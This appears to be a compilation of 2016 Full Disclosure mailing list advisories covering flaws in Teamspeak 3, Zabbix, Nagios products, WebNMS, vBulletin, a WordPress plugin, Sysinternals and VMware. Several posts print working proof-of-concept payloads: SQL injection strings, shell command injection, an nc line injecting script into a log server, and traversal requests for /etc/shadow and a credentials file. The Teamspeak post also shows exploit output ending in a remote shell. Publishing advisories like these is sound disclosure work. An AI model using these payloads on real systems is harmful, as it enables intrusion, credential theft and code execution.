[FD] RCE in Teamspeak 3 server

[Hanz Jenson]

While auditing the Teamspeak 3 server I've discovered several 0-day
vulnerabilities which I'll describe in detail in this advisory. They exist in
the newest version of the server, version 3.0.13.

I found 10 vulnerabilities. Some of these are critical and allow remote code
execution. For the average user, that means that these vulnerabilities can be
exploited by a malicious attacker in order to take over any Teamspeak server,
not only becoming serveradmin, but getting a shell on the affected machine.

Here's the output of an exploit which uses two of the vulnerabilities:

$ python exploit_teamspeak.py
leaking distinct stack pointers
 '\xa2'  '\x9a'  '\x8a' . '_' .. '\xa0'
got a ptr: 0x7fa29a8a5fa0
 '\xa2'  '\x9a'  '\x9a'  'o' ... '\xa0'
got a ptr: 0x7fa29a9a6fa0
 '\xa2'  '\x9a'  '\xaa' . '\x7f'  '\xa0'
got a ptr: 0x7fa29aaa7fa0
stack ptr: 0x7fa29a8a5fa0
assumed stack base: 0x7fa29a5a5000
sleeping a bit to avoid flood detection...
initializing stack sprayers
spraying the stacks
doing some magic.

Got a shell from ('127.0.0.1', 38416)
ts3@ts3:/home/ts3/teamspeak3-server$


I won't release the exploit anytime soon, but I will note that writing one is
a great learning experience.


Next I'll describe my findings. I'll be referring to function names. The
Teamspeak developers strip their binaries of symbols, but they messed up once
and forgot to do so.

If you want to follow along at home, I'm sure your favorite search engine can
help you find the non-stripped server binary.

Now on to the vulns!


--- vuln 1: race condition leading to use-after-free ---

The ts3 server is threaded. When accessing objects like a Client or a Channel,
which can be shared among threads, it's necessary to hold a mutex. However the
function VirtualServerBase::sendCommandLowPacket drops its mutex before
accessing a Client object. Here's the vulnerable code:

0x49d26d:
call_pthread_mutex_unlock
mov rdi, client

; this will mov rax, [rdi+0F0h]
callClient::getTransmissionReceiveBase(void)

mov rcx, [rax]
mov rdx, [rbx+VirtualServer.vsb.vserv_id]
mov rdi, rax
mov rsi, r14
callqword ptr [rcx+58h]

As we can see, the mutex is unlocked and then a TransmissionReceiveBase struct
is taken out of the Client. Then its vtable is used for a call. Looking at
the kernel source we see that, at least on Linux, _pthread_mutex_unlock will
swap out the current thread if there's another thread blocked waiting for the
mutex.

This other thread could then free the Client and place controlled data on top
of the freed block. When the first thread runs again, we control the
TransmissionReceiveBase object completely. The indirect call through its
vtable allows us to get $pc.

This is one of the vulnerabilities used in the exploit above.


--- vuln 2: disclosure of a partially uninitialized stack buffer ---

When a client first connects to the server, it sends over an IV. The IV is
base64-encoded. The server decodes it in VirtualServerBase::clientInitIV.
However the server ignores the return value of Crypt::decodeBase64 which is
the decoded length. Instead it assumes that the length is always 10 bytes.

If the client only encodes e.g. 9 bytes and sends them over, one byte of the
IV will be uninitialized. The client can guess this byte. Only a correct guess
will prevent later cryptographic operations from failing. Thus the client can
deduce the byte. It can repeat the process, sending over only 8 bytes, etc.
This lets us do a byte-at-a-time leak from the stack.

Specifically it lets us leak a stack pointer, beating ASLR. This was used in
the exploit above.


--- vuln 3: disclosure of heap memory ---

The ts3 server compresses command packets with the "qlz" library. However a
known vulnerability resides in one of the older versions of this library.
This was already fixed in the newest qlz release (a beta release). However the
ts3 server uses an older version of this library.

The vulnerability is described here:

http://blog.frama-c.com/index.php?post/2011/04/05/QuickLZ-1

But it's straightforward to find for anyone looking at qlz's source code. You
don't need any fancy "software analyzer" to find it, like in that silly blog
post.

The vulnerability is qlz-specific and essentially allows you to "decompress"
data, but much of the decompressed data is actually uninitialized.

Why is this a problem for the ts3 server? Because we can send a short
compressed command packet over which starts with "some_command return_code=".
When we use this vuln and the packet is decompressed, the following bytes will
be included in the packet. So the packet that ts3 sees is "some_command
return_code=".

Since the return_code parameter is reflected back to us, this lets us leak
data from the heap.


-

[FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

[1n3]

=
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com 
Patch link: https://support.zabbix.com/browse/ZBX-11023 
Credit: 1N3@CrowdShield 
==
 
 
Vendor Description:
=
Zabbix is an open source availability and performance monitoring solution. 
 
 
Vulnerability Overview:
=
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability 
due to a failure to sanitize input in the toggle_ids array in the latest.php 
page.
 
 
Business Impact:
=
By exploiting this SQL injection vulnerability, an authenticated attacker (or 
guest user) is able to gain full access to the database. This would allow an 
attacker to escalate their privileges to a power user, compromise the database, 
or execute commands on the underlying database operating system.
 
Because of the functionalities Zabbix offers, an attacker with admin privileges 
(depending on the configuration) can execute arbitrary OS commands on the 
configured Zabbix hosts and server. This results in a severe impact to the 
monitored infrastructure.
 
Although the attacker needs to be authenticated in general, the system could 
also be at risk if the adversary has no user account. Zabbix offers a guest 
mode which provides a low privileged default account for users without 
password. If this guest mode is enabled, the SQL injection vulnerability can be 
exploited unauthenticated.
 
 
Proof of Concept:
=
 
latest.php?output=ajax==toggle_open_state=1_ids[]=15385);
 select * from users where (1=1

Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, 
idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users 
where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → 
DBexecute() in 
/home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185


Disclosure Timeline:
=

7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after 
a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Nagios Incident Manager Multiple Vulnerabilities

[Francesco Oddo]

(, ) (,
  .   '.' ) ('.',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _/  / _  \     _
 \  \==/ /_\  \ _/ ___\/  _ \ / \
 /   \/   |\\  \__(  <_> )  Y Y  \
/__  /\___|__  / \___  >/|__|_|  /
\/ \/.-.\/ \/:wq
(x.0)
  '=.|w|.='
  _=''"''=.

presents..

Nagios Incident Manager Multiple Vulnerabilities
Affected versions: Nagios Incident Manager <= 2.0.0

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf

+---+
|Description|
+---+
The Nagios Incident Manager application is vulnerable to multiple
vulnerabilities, including remote code execution via command injection,
SQL injection and stored cross-site scripting.


++
|Exploitation|
++
==Command Injection==
Multiple command injection vulnerabilities exist within the incident
report file generation functionality as user input is passed to system
shell calls without validation. A limited non-administrative user, who
by default does not have permissions to add custom MIME types for
incident file attachments, can exploit these vulnerabilities to obtain
remote code execution on the Incident Manager system as the ‘apache’ user.

URL => /nagiosim/reports/download//mttr/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//closed/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//first_response/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//general/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo


==SQL Injection==
The Nagios IM admin functionality to update the application settings is
vulnerable to an SQL Injection vulnerability via error-based payloads.
An attacker can inject into the ‘timezone’ POST parameter and retrieve
sensitive information from the application MySQL database.

URL => /nagiosim/admin/settings
Method => POST
Parameter => timezone
Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '


==Stored Cross-Site Scripting==
Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
web interface, allowing a standard user to insert malicious JavaScript
payloads into administrative and non-administrative application
functionality. This attack vector could be used by an authenticated
attacker with standard user privileges to hijack the session of an admin
user and extend their permissions within the application (e.g. adding
PHP as a valid MIME type for file attachments).

URL => /nagiosim/incidents/add
Method => POST
Parameters => title, summary, priority, file_description, status
Render => /nagiosim/incidents, /nagiosim/incidents/details/
POC Payload => alert(1)

URL => /nagiosim/api/incidents//messages
Method => POST
Parameters => title
Render => /nagiosim/incidents/details/
POC Payload => alert(1)

URL => /nagiosim/profile
Method => POST
Parameters => username, first_name, last_name
Render => /nagiosim/admin/users, Global Menu Banner (username)
POC Payload => alert(1)

+--+
| Solution |
+--+
Upgrade to Nagios Incident Manager 2.0.1


++
|  Timeline  |
++
2/06/2016 - Initial disclosure to vendor
3/06/2016 - Vendor acknowledges receipt of advisory
8/07/2016 - Vendor releases patched software version (2.0.1)
11/08/2016 – Public disclosure



++
| Additional |
++
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Nagios Network Analyzer Multiple Vulnerabilities

[Francesco Oddo]

(, ) (,
  .   '.' ) ('.',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _/  / _  \     _
 \  \==/ /_\  \ _/ ___\/  _ \ / \
 /   \/   |\\  \__(  <_> )  Y Y  \
/__  /\___|__  / \___  >/|__|_|  /
\/ \/.-.\/ \/:wq
(x.0)
  '=.|w|.='
  _=''"''=.

presents..

Nagios Network Analyzer Multiple Vulnerabilities
Affected versions: Nagios Network Analyzer <= 2.2.0

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf

+---+
|Description|
+---+
The Nagios Network Analyzer application is affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection and privilege escalation.

These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.

++
|Exploitation|
++
==Authentication Bypass==
Authentication for the Nagios Network Analyzer web management interface
can be bypassed due to an insecure implementation of the function
validating session cookies within the ‘Session.php’ file. As shown
below, the application uses a base64 encoded serialized PHP string along
with a SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:

 
a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx";
 s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";s:13:"last_activity";
 
i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email";
 
s:30:"xxx...@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";
 
s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession";
 b:1;s:7:"view_id";i:0;}

The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.

Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.

The script on the following page generates session cookies which are
accepted and validated successfully by the application. A ‘user_id’
value of 1 can be used to initiate a session in the context of the admin
user.

[POC - nagiosna_forge_cookie.php]


This vulnerability is present across multiple Nagios products.


==SQL Injection==
Multiple SQL injection vulnerabilities exist in the application web
management interface. An attacker can exploit this vulnerabilities to
retrieve sensitive data from the application MySQL database.

URL =>
/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0%5Bcol%5D=%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)

URL =>
/nagiosna/index.php/api/sources/read?o%5Bcol%5D=%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)

URL => /nagiosna/index.php/admin/globals
Method => POST
Parameter => timezone
POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT
COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS
CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT
0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND '%'=''


==Command Injection==
A command injection vulnerability exists in the function generating PDF
reports for download. Base64 encoded user-supplied input is passed as an
argument to system shell calls without being escaped. An attacker can
inject arbitrary shell commands and obtain remote code execution in the
context of the apache user.

URL => /nagiosna/index.php/download/report/sourcegroup//
Method => GET
POC Payload => q[rid]=5[gid]=1" "";{touch,/tmp/TESTFILE};echo "

URL => /nagiosna/index.php/download/report/source//
Method => GET
POC Payload => q[rid]=5[gid]=1" "";{touch,/tmp/TESTFILE};echo "

Arbitrary code execution in the context of the ‘nna’ user can also be
obtained by abusing the intended functionality to define custom alert
commands. As shown in the next section, this exposes the application to
additional privilege escalation attack vectors.


==Privilege Escalation==
The default application 

[FD] Nagios Log Server Multiple Vulnerabilities

[Francesco Oddo]

(, ) (,
  .   '.' ) ('.',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _/  / _  \     _
 \  \==/ /_\  \ _/ ___\/  _ \ / \
 /   \/   |\\  \__(  <_> )  Y Y  \
/__  /\___|__  / \___  >/|__|_|  /
\/ \/.-.\/ \/:wq
(x.0)
  '=.|w|.='
  _=''"''=.

presents..

Nagios Log Server Multiple Vulnerabilities
Affected versions: Nagios Log Server <= 1.4.1

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf

+---+
|Description|
+---+
The Nagios Log Server application is affected by multiple security
vulnerabilities, including authentication bypass, stored cross-site
scripting, inconsistent authorization controls and privilege escalation.

These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.


++
|Exploitation|
++
==Authentication Bypass==
Authentication for the Nagios Log Server web management interface can be
bypassed due to an insecure implementation of the function validating
session cookies within the ‘Session.php’ file. As shown below, the
application uses a base64 encoded serialized PHP string along with a
SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:

a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123";
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";
s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user";
s:5:"email";s:16:"t...@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}

The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.

Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.

The script on the following page generates session cookies which are
accepted and validated successfully by the application. A ‘user_id’
value of 1 can be used to initiate a session in the context of the admin
user.

[POC - nagiosls_forge_cookie.php]



This vulnerability is present across multiple Nagios products.


==Stored Cross-Site Scripting==
The Nagios Log Server application does not validate and HTML encode log
data sent by configured sources. This issue is aggravated by the fact
that the application does not maintain a list of authorized log sources,
but instead accept data from any host connecting to the Nagios Log
Server port responsible of collecting logs (TCP 5544). An attacker can
exploit this vulnerability to send malicious JavaScript code and execute
it in the context of Nagios Log Server user session as shown below.

[POC STORED XSS]
# echo 'alert("xss")' | nc [TARGET IP] 5544

The payload gets rendered under '/nagioslogserver/dashboard'.

==Inconsistent Authorization Controls==
The Nagios Log Server application provides intended functionality to
define custom alert commands using different configuration options. By
default, only administrative users can define alert commands which
execute scripts on the Log Server filesystem when an alert is triggered.

However, the application does not properly enforce authorization checks
and an attacker can access the same functionality in the context of a
standard user session by providing the correct payload in the ‘alert’
POST parameter. This functionality can be abused to obtain remote code
execution on the target system as the application does not restrict the
script definition to a single folder and an attacker can specify
absolute paths to any script or executable file present on the Log
Server host.

[POC - CREATE COMMAND EXECUTION ALERT]
URL => /nagioslogserver/api/check/create/1
Method => POST
Payload =>
alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1",
"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch",
"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"}


==Privilege Escalation==
The default Log Server application sudoers configuration allows the
‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without
being prompted for a 

[FD] CVE-2016-6483 - vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)

[Dawid Golunski]

vBulletin
CVE-2016-6483

vBulletin software is affected by a SSRF vulnerability that allows
unauthenticated remote attackers to access internal services (such as mail
servers, memcached, couchDB, zabbix etc.) running on the server
hosting vBulletin as well as services on other servers on the local
network that are accessible from the target.

The following versions are affected:

vBulletin  <= 5.2.2
vBulletin  <= 4.2.3
vBulletin  <= 3.8.9

Technical details,PoC vBulletin exploits and links to patches provided
by the vendor can be found at:

http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt

-- 
Regards,
Dawid Golunski
http://legalhackers.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CVE-2016-6600/1/2/3]: Multiple vulnerabilities (RCE, file download, etc) in WebNMS Framework 5.2 / 5.2 SP1

[Pedro Ribeiro]

tl;dr

RCE, file download, weak encryption and user impersonation, all of which
can be exploited by an unauthenticated attacker in WebNMS Framework 5.2
and 5.2 SP1.

A special thanks to Beyond Security and their SSD program, which helped
disclose the vulnerabilities. See their advisory at
https://blogs.securiteam.com/index.php/archives/2712

My full advisory can be seen below, and a copy can be obtained at the
github repo
https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt

Metasploit modules have also been released.

Regards,
Pedro



>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 04/07/2016 / Last updated: 08/08/2016

>> Background on the affected product:
"WebNMS is an industry-leading framework for building network management
applications. With over 25,000 deployments worldwide and in every Tier 1
Carrier, network equipment providers and service providers can
customize, extend and rebrand WebNMS as a comprehensive Element
Management System (EMS) or Network Management System (NMS).
NOC Operators, Architects and Developers can customize the functional
modules to fit their domain and network. Functional modules include
Fault Correlation, Performance KPIs, Device Configuration, Service
Provisioning and Security. WebNMS supports numerous Operating Systems,
Application Servers, and databases."


>> Summary:
WebNMS contains three critical vulnerabilities that can be exploited by
an unauthenticated attacker: one directory traversal that can be used to
achieve remote code execution, another directory traversal that can be
abused to download any text file in the system and the possibility to
impersonate any user in the system. In addition, WebNMS also stores the
user passwords in a file with a weak obfuscation algorithm that can be
easily reversed.

A special thanks to the SecuriTeam Secure Disclosure programme (SSD),
which performed the disclosure in a responsible manner to the affected
vendor. This advisory can be seen in their blog at
https://blogs.securiteam.com/index.php/archives/2712


>> Technical details:
#1
Vulnerability: Directory traversal in file upload functionality (leading
to remote code execution)
CVE-2016-6600
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FileUploadServlet has a directory traversal vulnerability, that
allows an unauthenticated attacker to upload a JSP file that executes on
the server.
To exploit this vulnerability, simply POST as per the proof of concept
below. The directory traversal is in the "fileName" parameter.

POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1


There are two things to keep in mind for the upload to be successful:
- Only text files can be uploaded, binary files will be mangled.
- In order to achieve code execution without authentication, the files
need to be dropped in ../jsp/ but they can only have the following
names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of
any length.


#2
Vulnerability: Directory traversal in file download functionality
CVE-2016-6601
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. Only text
files can be downloaded properly, any binary file will get mangled by
the servlet and downloaded incorrectly.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FetchFile servlet has a directory traversal vulnerability that can
be abused by an unauthenticated attacker to download arbitrary files
from the WebNMS host. The vulnerable parameter is "fileName" and a proof
of concept is shown below.

GET /servlets/FetchFile?fileName=../../../etc/shadow


#3
Vulnerability: Weak obfuscation algorithm used to store passwords
CVE-2016-6602
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory)
contains entries with all the usernames and passwords in the server:



The algorithm used to obfuscate is convoluted but easy to reverse
engineer. The passwords above are "guest" for the "guest" user and
"admin" for the "root" user. A Metasploit module implementing the
deobfuscation algorithm has been released.

This vulnerability can be combined with #2 and allow an unauthenticated
attacker to obtain credentials for all user accounts:
GET /servlets/FetchFile?fileName=conf/securitydbData.xml


#4
Vulnerability: User account impersonation / hijacking
CVE-2016-6603
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

It is possible to impersonate any user in WebNMS by simply setting the
"UserName" HTTP header when 

[FD] Stored XSS in Advanced Custom Fields: Table Field allows authenticated users to do almost anything an admin user can (WordPress plugin)

[dxw Security]

Details

Software: Advanced Custom Fields: Table Field
Version: 1.1.12
Homepage: https://wordpress.org/plugins/advanced-custom-fields-table-field/
Advisory report: 
https://security.dxw.com/advisories/xss-in-advanced-custom-fields-table-field-could-allow-authenticated-users-to-do-almost-anything-an-admin-user-can/
CVE: Awaiting assignment
CVSS: 4.9 (Medium; AV:N/AC:M/Au:S/C:P/I:P/A:N)

Description

Stored XSS in Advanced Custom Fields: Table Field allows authenticated users to 
do almost anything an admin user can

Vulnerability

This plugin allows users (who have permission to edit posts) to inject 
JavaScript into pages within /wp-admin/. This means a user can exceed their 
privileges by creating a script that causes an admin’s browser to perform an 
action, such as creating a new admin user, deleting all posts, etc.

Proof of concept


Add a new ACF field group
Add a new table-type field to that field group
Create a new post/page, wherever the field group is set to display
Enter “alert(1)” into a field and save the post
Visit the page again, and the injected JavaScript will be executed

Tested with ACF PRO v5. Not tested with v4.

Mitigations

Update to version 1.1.13 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report with 14 days.

Timeline


2016-07-13: Discovered
2016-07-13: Reported to vendor by email
2016-07-13: Requested CVE
2016-07-13: Vendor’s autoresponder said they were unavailable until 1st August
2016-08-01: Vendor reported they were working on a fix
2016-08-01: Vendor reported issue fixed in 1.1.13
2016-08-08: Advisory published



Discovered by dxw:

Tom Adams
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DDanchev's Blog Going Private - Request Access

[Ddanchev]

Hi, everyone,


As, of, today, my, blog - http://ddanchev.blogspot.com is going, private, and, 
I, decided, to, let, everyone, know, on, how, to, request, access, to, 
continue, to, maintain, access, to, the, blog.

[http://ddanchev.blogspot.com/2016/08/ddanchevs-blog-going-private-request.html](http://ddanchev.blogspot.de/2016/08/ddanchevs-blog-going-private-request.html)

Looking forward to receiving your response.

Let me know.

Thanks,
Dancho

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Defense in depth -- the Microsoft way (part 42): Sysinternals utilities load and execute rogue DLLs from %TEMP%

[Stefan Kanthak]

Hi @ll,

several of Microsoft's Sysinternals utilities extract executables
to %TEMP% and run them from there; the extracted executables are
vulnerable to DLL hijacking, allowing arbitrary code execution in
every user account and escalation of privilege in "protected
administrator" accounts [*].

* CoreInfo.exe:
  extracts on x64 an embedded CoreInfo64.exe to %TEMP% which loads
%TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes it with the callers credentials.

* Disk2VHD.exe:
  extracts on Windows 2003 and newer, both x86 and x64, an embedded
  Disk2VHD-tmp.exe to %TEMP% which loads
%TEMP%\UXTHEME.DLL
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003.

* DiskView.exe:
  extracts on x64 an embedded DiskView64.exe to %TEMP% which loads
%TEMP%\UXTHEME.DLL
  and executes it with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003 and
  Windows XP.

* ProcMon.exe:
  extracts on x64 an embedded ProcMon64.exe to %TEMP% which loads
%TEMP%\UXTHEME.DLL,
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with the callers credentials.

* RAMMap.exe:
  extracts on x64 an embedded RAMMap64.exe to %TEMP% which loads
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\UXTHEME.DLL,
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with administrative privileges on Windows Vista
  and newer, and with the callers credentials on Windows 2003.

* VMMap.exe:
  extracts on x64 an embedded VMMap64.exe to %TEMP% which loads
%TEMP%\CLBCATQ.DLL (on Windows 2003),
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\UXTHEME.DLL,
%TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with the callers credentials.

* ZoomIt.exe:
  extracts on x64 an embedded ZoomIt64.exe to %TEMP% which loads
%TEMP%\SETUPAPI.DLL (on Windows 2003),
%TEMP%\UXTHEME.DLL,
%TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes them with the callers credentials.


See ,
,
,
 and
 for these
WELL-KNOWN and WELL-DOCUMENTED vulnerabilities^Wbeginner's
errors!


Mitigations:


* Don't use these vulnerable utilities (or other crapware
  which runs executables from unsafe directories like %TEMP%)!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
   to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak

[*] according to Microsoft's own SIR reports, more than half of
the Windows installations which send telemetry data have only
one active user account, i.e. some hundred million Windows
installations are susceptible to this design bug!


Timeline:
~

2015-11-02vulnerability report sent to author and vendor

  NO REPLY from author

2015-11-17vendor replies, opens MSRC case 31724

2016-01-29vendor replies, closes MSRC case 31724: WONTFIX

2016-08-11report published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NEW VMSA-2016-0011 - vRealize Log Insight update addresses directory traversal vulnerability.

[VMware Security Response Center]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
---
   VMware Security Advisory

Advisory ID: VMSA-2016-0011
Severity:Moderate
Synopsis:vRealize Log Insight update addresses directory traversal
 vulnerability.
Issue date:  2016-08-11
Updated on:  2016-08-11 (Initial Advisory)
CVE number:  CVE-2016-5332

1. Summary

   vRealize Log Insight update addresses directory traversal vulnerability.

2. Relevant Products

   vRealize Log Insight

3. Directory traversal vulnerability in vRealize Log Insight

   vRealize Log Insight contains a vulnerability that may allow for a directory
   traversal attack. Exploitation of this issue may lead to a partial 
information
   disclosure. There are no known workarounds for this issue.

   VMware would like to thank Peter Nelson, Security Engineer at WakeMed Health
   & Hospitals for reporting this issue to us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
   the identifier CVE-2016-5332 to this issue.

   Column 5 of the following table lists the action required to remediate the
   vulnerability in each release, if a solution is available.

   VMware Product   Running  Replace with/
   ProductVersion   onSeverity   Apply Patch 
Workaround
      ===   ===      =   
==
   vRealize Log Insight   3.x   VAModerate   3.6.0   None
   vRealize Log Insight   2.x   VAModerate   3.6.0   None

4. Solution

   Please review the patch/release notes for your product and version and verify
   the checksum of your downloaded file.

   vRealize Log Insight 3.6.0
   Downloads and Documentation:
   
https://my.vmware.com/web/vmware/details?downloadGroup=VRLI-360=598=12336

5. References

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5332

- 

6. Change log

   2016-08-11 VMSA-2016-0011 Initial security advisory in conjunction with the
   release of vRealize Log Insight 3.6.0 on 2016-08-11.

- 

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org

   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html

   VMware Lifecycle Support Phases
